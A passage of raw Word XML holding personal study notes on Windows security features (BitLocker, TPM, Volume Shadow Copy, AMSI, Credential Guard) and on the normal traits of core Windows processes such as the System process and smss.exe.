        </w:rPr>
        <w:t>Others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AF7EC" w14:textId="77777777" w:rsidR="000F399E" w:rsidRPr="00C00009" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B64BF1" w14:textId="27803FC4" w:rsidR="003274C3" w:rsidRPr="0020196E" w:rsidRDefault="0020196E" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0020196E">
        <w:t>released</w:t>
      </w:r>
      <w:r w:rsidR="003274C3" w:rsidRPr="0020196E">
        <w:t xml:space="preserve"> on the 2nd Tuesday of each month. Patch Tuesday (if there an urgent patch it's ok to be released at any time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA97D10" w14:textId="302FBBD6" w:rsidR="000F399E" w:rsidRPr="00C00009" w:rsidRDefault="000F399E" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Defender SmartScreen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D63C9" w14:textId="7B620D69" w:rsidR="003274C3" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Defender SmartScreen (windows </w:t>
      </w:r>
      <w:r w:rsidR="0020196E" w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>protection) (</w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">app &amp; browse control) </w:t>
      </w:r>
      <w:r w:rsidRPr="0020196E">
        <w:t>protects against phishing or malware websites and applications, and the downloading of potentially malicious files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6BBE4" w14:textId="682F4E8E" w:rsidR="0020196E" w:rsidRPr="003274C3" w:rsidRDefault="0020196E" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="0020196E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00955886">
        <w:t xml:space="preserve">from settings, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00955886">
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>Memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2B78D" w14:textId="77777777" w:rsidR="000F399E" w:rsidRPr="00C00009" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Trusted Platform Module (TPM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689DA9D" w14:textId="41088E90" w:rsidR="003274C3" w:rsidRPr="0020196E" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0020196E">
        <w:t>technology is designed to provide hardware-based, security-related functions</w:t>
      </w:r>
      <w:r w:rsidR="0020196E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0020196E" w:rsidRPr="0020196E">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0020196E" w:rsidRPr="0020196E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AAA494" w14:textId="77777777" w:rsidR="0020196E" w:rsidRPr="00C00009" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">BitLocker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6426D5" w14:textId="1931ED83" w:rsidR="00561B93" w:rsidRPr="00561B93" w:rsidRDefault="00561B93" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00561B93">
        <w:t>uilt-in Windows feature that encrypts entire drives, protecting data from unauthorized access even if the drive is stolen or physically removed from the computer. It uses encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00561B93">
        <w:t xml:space="preserve">BitLocker encrypts the entire drive, prevents unauthorized access to the data, even if someone physically removes </w:t>
      </w:r>
      <w:r w:rsidRPr="00561B93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the drive and tries to access it on another computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194962B" w14:textId="5C2FBD3F" w:rsidR="003274C3" w:rsidRPr="0020196E" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00561B93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Drive Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="0020196E">
        <w:t xml:space="preserve"> is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately </w:t>
      </w:r>
      <w:r w:rsidR="0020196E">
        <w:t>stopping</w:t>
      </w:r>
      <w:r w:rsidRPr="0020196E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0020196E" w:rsidRPr="0020196E">
        <w:t>computers. (</w:t>
      </w:r>
      <w:r w:rsidRPr="0020196E">
        <w:t>BitLocker provides the most protection when used with a Trusted Platform Module (TPM) version 1.2 or later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51E75C" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0020196E" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0020196E">
        <w:t>TPM is a hardware component installed in many newer computers by the computer manufacturers. It works with BitLocker to help protect user data and to ensure that a computer has not been tampered with while the system was offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2571F1" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0020196E" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0020196E">
        <w:t>BitLocker helps mitigate unauthorized data access by enhancing file and system protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090E2E5" w14:textId="039B077B" w:rsidR="003274C3" w:rsidRPr="00561B93" w:rsidRDefault="00561B93" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00561B93">
        <w:t>BitLocker is a software-based encryption feature, but it often uses hardware (like a TPM chip) to enhance security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66921D99" w14:textId="77777777" w:rsidR="0020196E" w:rsidRPr="00C00009" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Volume Shadow Copy Service (VSS) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D5BD0" w14:textId="582A87EB" w:rsidR="003274C3" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0020196E">
        <w:t>technology in Windows operating systems designed to create "shadow copies," or snapshots, of data. This allows for consistent backups of files, even if they're currently in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33845B8D" w14:textId="79DA661D" w:rsidR="00073F25" w:rsidRPr="002A0EAF" w:rsidRDefault="00073F25" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0EAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Shadow Copy</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0EAF">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>: the idea of creating a snapshot of partition in 10% space of partition space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> while data is used,</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0EAF">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> it works as backup that we can get older version of disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B90065" w14:textId="77777777" w:rsidR="00073F25" w:rsidRPr="002A0EAF" w:rsidRDefault="00073F25" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="3240"/>
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0EAF">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>It configured enable on volume disk but in restore we can restore the older version of all disk or single folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59086E82" w14:textId="793731B8" w:rsidR="00073F25" w:rsidRPr="000F354D" w:rsidRDefault="00073F25" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0EAF">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>from folder properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F46C9" w14:textId="10FBCD5E" w:rsidR="003274C3" w:rsidRPr="0020196E" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0020196E">
        <w:t>VSS creates a "point-in-time" version of files (snapshot or an exact copy of the data as it existed at a specific moment), allows backup applications to copy data without causing downtime, can also access these snapshots to recover previous versions of files without needing a full restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B87D3" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D469EB2" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="00C00009" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA147A0" w14:textId="01EE9D7B" w:rsidR="000F354D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Antimalware Scan Interface (AMSI) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6942BB7F" w14:textId="75ED59F7" w:rsidR="003274C3" w:rsidRPr="000F354D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000F354D">
        <w:t>versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FF71D" w14:textId="5B8BF5BA" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Guard</w:t>
      </w:r>
      <w:r w:rsidR="005C2696">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005C2696" w:rsidRPr="005C2696">
        <w:t>enabled by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F4DCE9" w14:textId="77777777" w:rsidR="005C2696" w:rsidRPr="005C2696" w:rsidRDefault="005C2696" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2696">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure Windows Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE6746" w14:textId="77777777" w:rsidR="005C2696" w:rsidRPr="005C2696" w:rsidRDefault="005C2696" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005C2696">
        <w:t>Windows Hello is a more personal and secure way to sign in to your Windows device. Instead of using a password, with Windows Hello you can sign in using facial recognition, fingerprint, or a PIN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33213C91" w14:textId="3526A936" w:rsidR="003274C3" w:rsidRDefault="005C2696" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="003274C3" w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ow attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="003274C3" w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on windows: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="003274C3" w:rsidRPr="00E12CE5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://lolbas-project.github.io</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="687D35DD" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13871631" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00955886">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5C37D4" w14:textId="1086841D" w:rsidR="00955886" w:rsidRDefault="00955886" w:rsidP="00955886">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A115E3" w14:textId="77777777" w:rsidR="00955886" w:rsidRDefault="00955886" w:rsidP="00955886">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955886">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core Windows Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F476F4" w14:textId="336C6A3B" w:rsidR="009134EF" w:rsidRPr="00472747" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00472747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Taks Manger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1484372D" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE15B0">
        <w:t>More Advances Task Manger Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE15B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Hacker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE15B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> Process Explorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE15B0">
        <w:t>these tools can give more info about windows processes</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F2053" w14:textId="77777777" w:rsidR="00F21C4D" w:rsidRPr="00472747" w:rsidRDefault="009134EF" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00472747">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00472747">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DE1A6" w14:textId="65A62B5E" w:rsidR="00F21C4D" w:rsidRPr="00122F98" w:rsidRDefault="005E6DEF" w:rsidP="00122F98">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="48"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6DEF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>runs only in kernel mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, Load OS.</w:t>
      </w:r>
      <w:r w:rsidR="00122F98">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00122F98" w:rsidRPr="00122F98">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>doesn’t have a file location like normal processes</w:t>
      </w:r>
      <w:r w:rsidR="00122F98">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> but</w:t>
      </w:r>
      <w:r w:rsidR="00122F98" w:rsidRPr="00122F98">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Internally tied to ntoskrnl.exe (Windows NT operating system kernel).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F45663B" w14:textId="462E7BBE" w:rsidR="009134EF" w:rsidRPr="005E6DEF" w:rsidRDefault="00F21C4D" w:rsidP="009134EF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal</w:t>
      </w:r>
      <w:r w:rsidR="009134EF" w:rsidRPr="005E6DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146FB7B5" w14:textId="32DAAF48" w:rsidR="009134EF" w:rsidRPr="007554F1" w:rsidRDefault="009134EF" w:rsidP="00C74B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path</w:t>
      </w:r>
      <w:r w:rsidRPr="007554F1">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E82CFD" w:rsidRPr="00C74B4F">
        <w:t>N/A</w:t>
      </w:r>
      <w:r w:rsidR="00E82CFD">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="007554F1">
        <w:t>C:\Windows\system32\ntoskrnl.exe (NT OS Kernel)</w:t>
      </w:r>
      <w:r w:rsidR="00E82CFD">
        <w:t xml:space="preserve"> when Using Advanced Task Manager Program like System Informer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53612B46" w14:textId="2CD79E8D" w:rsidR="00C74B4F" w:rsidRPr="00C74B4F" w:rsidRDefault="00C74B4F" w:rsidP="00E82CFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74B4F">
        <w:t>: None</w:t>
      </w:r>
      <w:r w:rsidR="00E82CFD">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidR="00E82CFD" w:rsidRPr="007554F1">
        <w:t>System Idle Process (0)</w:t>
      </w:r>
      <w:r w:rsidR="00E82CFD">
        <w:t xml:space="preserve"> from Advanced Task Manger Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C6087A" w14:textId="4C84FA61" w:rsidR="00C74B4F" w:rsidRPr="00C74B4F" w:rsidRDefault="00C74B4F" w:rsidP="00C74B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74B4F">
        <w:t>: One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35400750" w14:textId="751EB0B9" w:rsidR="00C74B4F" w:rsidRPr="00C74B4F" w:rsidRDefault="00C74B4F" w:rsidP="00C74B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74B4F">
        <w:t>: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1739A1" w14:textId="1FD2CD67" w:rsidR="00C74B4F" w:rsidRDefault="00C74B4F" w:rsidP="00C74B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74B4F">
        <w:t>: At boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AA1E0" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="00C74B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidRPr="007554F1">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B61037D" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB7F2B" w14:textId="13EC8469" w:rsidR="00F21C4D" w:rsidRDefault="009134EF" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smss.exe </w:t>
      </w:r>
      <w:r w:rsidR="00D479DF" w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Session Manager Subsystem)</w:t>
      </w:r>
      <w:r w:rsidR="004C4221">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
